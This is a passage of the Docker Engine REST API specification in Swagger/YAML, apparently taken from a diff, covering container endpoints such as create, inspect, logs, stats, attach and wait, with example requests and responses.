NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.8" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:08" + Mounts: [] + - Id: "3176a2479c92" + Names: + - "/sleepy_dog" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 3333333333333333" + Created: 1367854154 + State: "Exited" + Status: "Exit 0" + Ports: [] + Labels: {} + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.6" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:06" + Mounts: [] + - Id: "4cb07b47f9fb" + Names: + - "/running_cat" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 444444444444444444444444444444444" + Created: 1367854152 + State: "Exited" + Status: "Exit 0" + Ports: [] + Labels: {} + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.5" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:05" + Mounts: [] + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server 
error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Container"] + /containers/create: + post: + summary: "Create a container" + operationId: "ContainerCreate" + consumes: + - "application/json" + - "application/octet-stream" + produces: + - "application/json" + parameters: + - name: "name" + in: "query" + description: "Assign the specified name to the container. Must match `/?[a-zA-Z0-9_-]+`." + type: "string" + pattern: "/?[a-zA-Z0-9_-]+" + - name: "body" + in: "body" + description: "Container to create" + schema: + allOf: + - $ref: "#/definitions/Config" + - type: "object" + properties: + HostConfig: + $ref: "#/definitions/HostConfig" + NetworkingConfig: + description: "This container's networking configuration." + type: "object" + properties: + EndpointsConfig: + description: "A mapping of network name to endpoint configuration for that network." + type: "object" + additionalProperties: + $ref: "#/definitions/EndpointSettings" + example: + Hostname: "" + Domainname: "" + User: "" + AttachStdin: false + AttachStdout: true + AttachStderr: true + Tty: false + OpenStdin: false + StdinOnce: false + Env: + - "FOO=bar" + - "BAZ=quux" + Cmd: + - "date" + Entrypoint: "" + Image: "ubuntu" + Labels: + com.example.vendor: "Acme" + com.example.license: "GPL" + com.example.version: "1.0" + Volumes: + /volumes/data: {} + WorkingDir: "" + NetworkDisabled: false + MacAddress: "12:34:56:78:9a:bc" + ExposedPorts: + 22/tcp: {} + StopSignal: "SIGTERM" + StopTimeout: 10 + HostConfig: + Binds: + - "/tmp:/tmp" + Links: + - "redis3:redis" + Memory: 0 + MemorySwap: 0 + MemoryReservation: 0 + KernelMemory: 0 + NanoCPUs: 500000 + CpuPercent: 80 + CpuShares: 512 + CpuPeriod: 100000 + CpuRealtimePeriod: 1000000 + CpuRealtimeRuntime: 10000 + CpuQuota: 50000 + CpusetCpus: "0,1" + CpusetMems: "0,1" + MaximumIOps: 0 + MaximumIOBps: 0 + BlkioWeight: 300 + BlkioWeightDevice: + - {} + BlkioDeviceReadBps: + - {} + BlkioDeviceReadIOps: + - {} + BlkioDeviceWriteBps: + - {} + 
BlkioDeviceWriteIOps: + - {} + MemorySwappiness: 60 + OomKillDisable: false + OomScoreAdj: 500 + PidMode: "" + PidsLimit: -1 + PortBindings: + 22/tcp: + - HostPort: "11022" + PublishAllPorts: false + Privileged: false + ReadonlyRootfs: false + Dns: + - "8.8.8.8" + DnsOptions: + - "" + DnsSearch: + - "" + VolumesFrom: + - "parent" + - "other:ro" + CapAdd: + - "NET_ADMIN" + CapDrop: + - "MKNOD" + GroupAdd: + - "newgroup" + RestartPolicy: + Name: "" + MaximumRetryCount: 0 + AutoRemove: true + NetworkMode: "bridge" + Devices: [] + Ulimits: + - {} + LogConfig: + Type: "json-file" + Config: {} + SecurityOpt: [] + StorageOpt: {} + CgroupParent: "" + VolumeDriver: "" + ShmSize: 67108864 + NetworkingConfig: + EndpointsConfig: + isolated_nw: + IPAMConfig: + IPv4Address: "172.20.30.33" + IPv6Address: "2001:db8:abcd::3033" + LinkLocalIPs: + - "169.254.34.68" + - "fe80::3468" + Links: + - "container_1" + - "container_2" + Aliases: + - "server_x" + - "server_y" + + required: true + responses: + 201: + description: "Container created successfully" + schema: + type: "object" + required: [Id, Warnings] + properties: + Id: + description: "The ID of the created container" + type: "string" + x-nullable: false + Warnings: + description: "Warnings encountered when creating the container" + type: "array" + x-nullable: false + items: + type: "string" + examples: + application/json: + Id: "e90e34656806" + Warnings: [] + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 406: + description: "impossible to attach" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "conflict" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Container"] + /containers/{id}/json: + get: + summary: 
"Inspect a container" + description: "Return low-level information about a container." + operationId: "ContainerInspect" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Id: + description: "The ID of the container" + type: "string" + Created: + description: "The time the container was created" + type: "string" + Path: + description: "The path to the command being run" + type: "string" + Args: + description: "The arguments to the command being run" + type: "array" + items: + type: "string" + State: + description: "The state of the container." + type: "object" + properties: + Status: + description: "The status of the container. For example, `running` or `exited`." + type: "string" + Running: + description: "Whether this container is running." + type: "boolean" + Paused: + description: "Whether this container is paused." + type: "boolean" + Restarting: + description: "Whether this container is restarting." + type: "boolean" + OOMKilled: + description: "Whether this container has been killed because it ran out of memory." + type: "boolean" + Dead: + type: "boolean" + Pid: + description: "The process ID of this container" + type: "integer" + ExitCode: + description: "The last exit code of this container" + type: "integer" + Error: + type: "string" + StartedAt: + description: "The time when this container was last started." + type: "string" + FinishedAt: + description: "The time when this container last exited." 
+ type: "string" + Image: + description: "The container's image" + type: "string" + ResolvConfPath: + type: "string" + HostnamePath: + type: "string" + HostsPath: + type: "string" + LogPath: + type: "string" + Node: + description: "TODO" + type: "object" + Name: + type: "string" + RestartCount: + type: "integer" + Driver: + type: "string" + MountLabel: + type: "string" + ProcessLabel: + type: "string" + AppArmorProfile: + type: "string" + ExecIDs: + type: "string" + HostConfig: + $ref: "#/definitions/HostConfig" + GraphDriver: + $ref: "#/definitions/GraphDriver" + SizeRw: + description: "The size of files that have been created or changed by this container." + type: "integer" + format: "int64" + SizeRootFs: + description: "The total size of all the files in this container." + type: "integer" + format: "int64" + Mounts: + type: "array" + items: + $ref: "#/definitions/MountPoint" + Config: + $ref: "#/definitions/Config" + NetworkSettings: + $ref: "#/definitions/NetworkConfig" + examples: + application/json: + AppArmorProfile: "" + Args: + - "-c" + - "exit 9" + Config: + AttachStderr: true + AttachStdin: false + AttachStdout: true + Cmd: + - "/bin/sh" + - "-c" + - "exit 9" + Domainname: "" + Env: + - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + Hostname: "ba033ac44011" + Image: "ubuntu" + Labels: + com.example.vendor: "Acme" + com.example.license: "GPL" + com.example.version: "1.0" + MacAddress: "" + NetworkDisabled: false + OpenStdin: false + StdinOnce: false + Tty: false + User: "" + Volumes: + /volumes/data: {} + WorkingDir: "" + StopSignal: "SIGTERM" + StopTimeout: 10 + Created: "2015-01-06T15:47:31.485331387Z" + Driver: "devicemapper" + HostConfig: + MaximumIOps: 0 + MaximumIOBps: 0 + BlkioWeight: 0 + BlkioWeightDevice: + - {} + BlkioDeviceReadBps: + - {} + BlkioDeviceWriteBps: + - {} + BlkioDeviceReadIOps: + - {} + BlkioDeviceWriteIOps: + - {} + ContainerIDFile: "" + CpusetCpus: "" + CpusetMems: "" + CpuPercent: 80 + CpuShares: 0 + 
CpuPeriod: 100000 + CpuRealtimePeriod: 1000000 + CpuRealtimeRuntime: 10000 + Devices: [] + IpcMode: "" + LxcConf: [] + Memory: 0 + MemorySwap: 0 + MemoryReservation: 0 + KernelMemory: 0 + OomKillDisable: false + OomScoreAdj: 500 + NetworkMode: "bridge" + PidMode: "" + PortBindings: {} + Privileged: false + ReadonlyRootfs: false + PublishAllPorts: false + RestartPolicy: + MaximumRetryCount: 2 + Name: "on-failure" + LogConfig: + Type: "json-file" + Sysctls: + net.ipv4.ip_forward: "1" + Ulimits: + - {} + VolumeDriver: "" + ShmSize: 67108864 + HostnamePath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname" + HostsPath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts" + LogPath: "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log" + Id: "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39" + Image: "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2" + MountLabel: "" + Name: "/boring_euclid" + NetworkSettings: + Bridge: "" + SandboxID: "" + HairpinMode: false + LinkLocalIPv6Address: "" + LinkLocalIPv6PrefixLen: 0 + SandboxKey: "" + SecondaryIPAddresses: null + SecondaryIPv6Addresses: null + EndpointID: "" + Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + IPAddress: "" + IPPrefixLen: 0 + IPv6Gateway: "" + MacAddress: "" + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.2" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:12:00:02" + Path: "/bin/sh" + ProcessLabel: "" + ResolvConfPath: 
"/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf" + RestartCount: 1 + State: + Error: "" + ExitCode: 9 + FinishedAt: "2015-01-06T15:47:32.080254511Z" + OOMKilled: false + Dead: false + Paused: false + Pid: 0 + Restarting: false + Running: true + StartedAt: "2015-01-06T15:47:32.072697474Z" + Status: "running" + Mounts: + - Name: "fac362...80535" + Source: "/data" + Destination: "/data" + Driver: "local" + Mode: "ro,Z" + RW: false + Propagation: "" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "size" + in: "query" + type: "boolean" + default: false + description: "Return the size of container as fields `SizeRw` and `SizeRootFs`" + tags: ["Container"] + /containers/{id}/top: + get: + summary: "List processes running inside a container" + description: "On Unix systems, this is done by running the `ps` command. This endpoint is not supported on Windows." 
+ operationId: "ContainerTop" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Titles: + description: "The ps column titles" + type: "array" + items: + type: "string" + Processes: + description: "Each process running in the container, where each is process is an array of values corresponding to the titles" + type: "array" + items: + type: "array" + items: + type: "string" + examples: + application/json: + Titles: + - "UID" + - "PID" + - "PPID" + - "C" + - "STIME" + - "TTY" + - "TIME" + - "CMD" + Processes: + - + - "root" + - "13642" + - "882" + - "0" + - "17:03" + - "pts/0" + - "00:00:00" + - "/bin/bash" + - + - "root" + - "13735" + - "13642" + - "0" + - "17:06" + - "pts/0" + - "00:00:00" + - "sleep 10" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "ps_args" + in: "query" + description: "The arguments to pass to `ps`. For example, `aux`" + type: "string" + default: "-ef" + tags: ["Container"] + /containers/{id}/logs: + get: + summary: "Get container logs" + description: | + Get `stdout` and `stderr` logs from a container. + + Note: This endpoint works only for containers with the `json-file` or `journald` logging driver. 
+ operationId: "ContainerLogs" + responses: + 101: + description: "logs returned as a stream" + schema: + type: "string" + format: "binary" + 200: + description: "logs returned as a string in response body" + schema: + type: "string" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "follow" + in: "query" + description: | + Return the logs as a stream. + + This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach). + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Return logs from `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Return logs from `stderr`" + type: "boolean" + default: false + - name: "since" + in: "query" + description: "Only return logs since this time, as a UNIX timestamp" + type: "integer" + default: 0 + - name: "timestamps" + in: "query" + description: "Add timestamps to every log line" + type: "boolean" + default: false + - name: "tail" + in: "query" + description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines." + type: "string" + default: "all" + tags: ["Container"] + /containers/{id}/changes: + get: + summary: "Get changes on a container’s filesystem" + description: | + Returns which files in a container's filesystem have been added, deleted, or modified. 
The `Kind` of modification can be one of: + + - `0`: Modified + - `1`: Added + - `2`: Deleted + operationId: "ContainerChanges" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + type: "object" + properties: + Path: + description: "Path to file that has changed" + type: "string" + Kind: + description: "Kind of change" + type: "integer" + enum: + - 0 + - 1 + - 2 + examples: + application/json: + - Path: "/dev" + Kind: 0 + - Path: "/dev/kmsg" + Kind: 1 + - Path: "/test" + Kind: 1 + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/export: + get: + summary: "Export a container" + description: "Export the contents of a container as a tarball." + operationId: "ContainerExport" + produces: + - "application/octet-stream" + responses: + 200: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/stats: + get: + summary: "Get container stats based on resource usage" + description: | + This endpoint returns a live stream of a container’s resource usage statistics. + + The `precpu_stats` is the CPU statistic of last read, which is used for calculating the CPU usage percentage. It is not the same as the `cpu_stats` field. 
+ operationId: "ContainerStats" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + examples: + application/json: + read: "2015-01-08T22:57:31.547920715Z" + pids_stats: + current: 3 + networks: + eth0: + rx_bytes: 5338 + rx_dropped: 0 + rx_errors: 0 + rx_packets: 36 + tx_bytes: 648 + tx_dropped: 0 + tx_errors: 0 + tx_packets: 8 + eth5: + rx_bytes: 4641 + rx_dropped: 0 + rx_errors: 0 + rx_packets: 26 + tx_bytes: 690 + tx_dropped: 0 + tx_errors: 0 + tx_packets: 9 + memory_stats: + stats: + total_pgmajfault: 0 + cache: 0 + mapped_file: 0 + total_inactive_file: 0 + pgpgout: 414 + rss: 6537216 + total_mapped_file: 0 + writeback: 0 + unevictable: 0 + pgpgin: 477 + total_unevictable: 0 + pgmajfault: 0 + total_rss: 6537216 + total_rss_huge: 6291456 + total_writeback: 0 + total_inactive_anon: 0 + rss_huge: 6291456 + hierarchical_memory_limit: 67108864 + total_pgfault: 964 + total_active_file: 0 + active_anon: 6537216 + total_active_anon: 6537216 + total_pgpgout: 414 + total_cache: 0 + inactive_anon: 0 + active_file: 0 + pgfault: 964 + inactive_file: 0 + total_pgpgin: 477 + max_usage: 6651904 + usage: 6537216 + failcnt: 0 + limit: 67108864 + blkio_stats: {} + cpu_stats: + cpu_usage: + percpu_usage: + - 8646879 + - 24472255 + - 36438778 + - 30657443 + usage_in_usermode: 50000000 + total_usage: 100215355 + usage_in_kernelmode: 30000000 + system_cpu_usage: 739306590000000 + throttling_data: + periods: 0 + throttled_periods: 0 + throttled_time: 0 + precpu_stats: + cpu_usage: + percpu_usage: + - 8646879 + - 24350896 + - 36438778 + - 30657443 + usage_in_usermode: 50000000 + total_usage: 100093996 + usage_in_kernelmode: 30000000 + system_cpu_usage: 9492140000000 + throttling_data: + periods: 0 + throttled_periods: 0 + throttled_time: 0 + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: 
"server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "stream" + in: "query" + description: "Stream the output. If false, the stats will be output once and then it will disconnect." + type: "boolean" + default: true + tags: ["Container"] + /containers/{id}/resize: + post: + summary: "Resize a container TTY" + description: "Resize the TTY for a container. You must restart the container for the resize to take effect." + operationId: "ContainerResize" + consumes: + - "application/octet-stream" + produces: + - "text/plain" + responses: + 200: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "cannot resize container" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "h" + in: "query" + description: "Height of the tty session in characters" + type: "integer" + - name: "w" + in: "query" + description: "Width of the tty session in characters" + type: "integer" + tags: ["Container"] + /containers/{id}/start: + post: + summary: "Start a container" + operationId: "ContainerStart" + responses: + 204: + description: "no error" + 304: + description: "container already started" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "detachKeys" + in: "query" + description: "Override 
the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`." + type: "string" + tags: ["Container"] + /containers/{id}/stop: + post: + summary: "Stop a container" + operationId: "ContainerStop" + responses: + 204: + description: "no error" + 304: + description: "container already stopped" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "t" + in: "query" + description: "Number of seconds to wait before killing the container" + type: "integer" + tags: ["Container"] + /containers/{id}/restart: + post: + summary: "Restart a container" + operationId: "ContainerRestart" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "t" + in: "query" + description: "Number of seconds to wait before killing the container" + type: "integer" + tags: ["Container"] + /containers/{id}/kill: + post: + summary: "Kill a container" + description: "Send a POSIX signal to a container, defaulting to killing the container." 
+ operationId: "ContainerKill" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "signal" + in: "query" + description: "Signal to send to the container as an integer or string (e.g. `SIGINT`)" + type: "string" + default: "SIGKILL" + tags: ["Container"] + /containers/{id}/update: + post: + summary: "Update a container" + description: "Change various configuration options of a container without having to recreate it." + operationId: "ContainerUpdate" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 200: + description: "The container has been updated." + schema: + type: "object" + properties: + Warnings: + type: "array" + items: + type: "string" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "update" + in: "body" + required: true + schema: + allOf: + - $ref: "#/definitions/Resources" + - type: "object" + properties: + RestartPolicy: + $ref: "#/definitions/RestartPolicy" + example: + BlkioWeight: 300 + CpuShares: 512 + CpuPeriod: 100000 + CpuQuota: 50000 + CpuRealtimePeriod: 1000000 + CpuRealtimeRuntime: 10000 + CpusetCpus: "0,1" + CpusetMems: "0" + Memory: 314572800 + MemorySwap: 514288000 + MemoryReservation: 209715200 + KernelMemory: 52428800 + RestartPolicy: + MaximumRetryCount: 4 + Name: "on-failure" + tags: ["Container"] + 
/containers/{id}/rename: + post: + summary: "Rename a container" + operationId: "ContainerRename" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 409: + description: "name already in use" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "name" + in: "query" + required: true + description: "New name for the container" + type: "string" + tags: ["Container"] + /containers/{id}/pause: + post: + summary: "Pause a container" + description: | + Use the cgroups freezer to suspend all processes in a container. + + Traditionally, when suspending a process the `SIGSTOP` signal is used, which is observable by the process being suspended. With the cgroups freezer the process is unaware, and unable to capture, that it is being suspended, and subsequently resumed. + operationId: "ContainerPause" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/unpause: + post: + summary: "Unpause a container" + description: "Resume a container which has been paused." 
+ operationId: "ContainerUnpause" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/attach: + post: + summary: "Attach to a container" + description: | + Attach to a container to read its output or send it input. You can attach to the same container multiple times and you can reattach to containers that have been detached. + + Either the `stream` or `logs` parameter must be `true` for this endpoint to do anything. + + See [the documentation for the `docker attach` command](https://docs.docker.com/engine/reference/commandline/attach/) for more details. + + ### Hijacking + + This endpoint hijacks the HTTP connection to transport `stdin`, `stdout`, and `stderr` on the same socket. + + This is the response from the daemon for an attach request: + + ``` + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + [STREAM] + ``` + + After the headers and two new lines, the TCP connection can now be used for raw, bidirectional communication between the client and server. + + To hint potential proxies about connection hijacking, the Docker client can also optionally send connection upgrade headers. 
+ + For example, the client sends this request to upgrade the connection: + + ``` + POST /containers/16253994b7c4/attach?stream=1&stdout=1 HTTP/1.1 + Upgrade: tcp + Connection: Upgrade + ``` + + The Docker daemon will respond with a `101 UPGRADED` response, and will similarly follow with the raw stream: + + ``` + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + [STREAM] + ``` + + ### Stream format + + When the TTY setting is disabled in [`POST /containers/create`](#operation/ContainerCreate), the stream over the hijacked connection is multiplexed to separate out `stdout` and `stderr`. The stream consists of a series of frames, each containing a header and a payload. + + The header contains the information which the stream writes (`stdout` or `stderr`). It also contains the size of the associated frame encoded in the last four bytes (`uint32`). + + It is encoded on the first eight bytes like this: + + ```go + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + ``` + + `STREAM_TYPE` can be: + + - 0: `stdin` (is written on `stdout`) + - 1: `stdout` + - 2: `stderr` + + `SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of the `uint32` size encoded as big endian. + + Following the header is the payload, which is the specified number of bytes of `STREAM_TYPE`. + + The simplest way to implement this protocol is the following: + + 1. Read 8 bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + + ### Stream format when using a TTY + + When the TTY setting is enabled in [`POST /containers/create`](#operation/ContainerCreate), the stream is not multiplexed. The data exchanged over the hijacked connection is simply the raw data from the process PTY and client's `stdin`. 
+ + operationId: "ContainerAttach" + produces: + - "application/vnd.docker.raw-stream" + responses: + 101: + description: "no error, hints proxy about hijacking" + 200: + description: "no error, no upgrade header found" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "detachKeys" + in: "query" + description: "Override the key sequence for detaching a container.Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`." + type: "string" + - name: "logs" + in: "query" + description: | + Replay previous logs from the container. + + This is useful for attaching to a container that has started and you want to output everything since the container started. + + If `stream` is also enabled, once all the previous output has been returned, it will seamlessly transition into streaming current output. 
+ type: "boolean" + default: false + - name: "stream" + in: "query" + description: "Stream attached streams from the time the request was made onwards" + type: "boolean" + default: false + - name: "stdin" + in: "query" + description: "Attach to `stdin`" + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Attach to `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Attach to `stderr`" + type: "boolean" + default: false + tags: ["Container"] + /containers/{id}/attach/ws: + get: + summary: "Attach to a container via a websocket" + operationId: "ContainerAttachWebsocket" + responses: + 101: + description: "no error, hints proxy about hijacking" + 200: + description: "no error, no upgrade header found" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "detachKeys" + in: "query" + description: "Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,`, or `_`." 
+ type: "string" + - name: "logs" + in: "query" + description: "Return logs" + type: "boolean" + default: false + - name: "stream" + in: "query" + description: "Return stream" + type: "boolean" + default: false + - name: "stdin" + in: "query" + description: "Attach to `stdin`" + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Attach to `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Attach to `stderr`" + type: "boolean" + default: false + tags: ["Container"] + /containers/{id}/wait: + post: + summary: "Wait for a container" + description: "Block until a container stops, then returns the exit code." + operationId: "ContainerWait" + produces: ["application/json"] + responses: + 200: + description: "The container has exit." + schema: + type: "object" + required: [StatusCode] + properties: + StatusCode: + description: "Exit code of the container" + type: "integer" + x-nullable: false + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}: + delete: + summary: "Remove a container" + operationId: "ContainerDelete" + responses: + 204: + description: "no error" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + 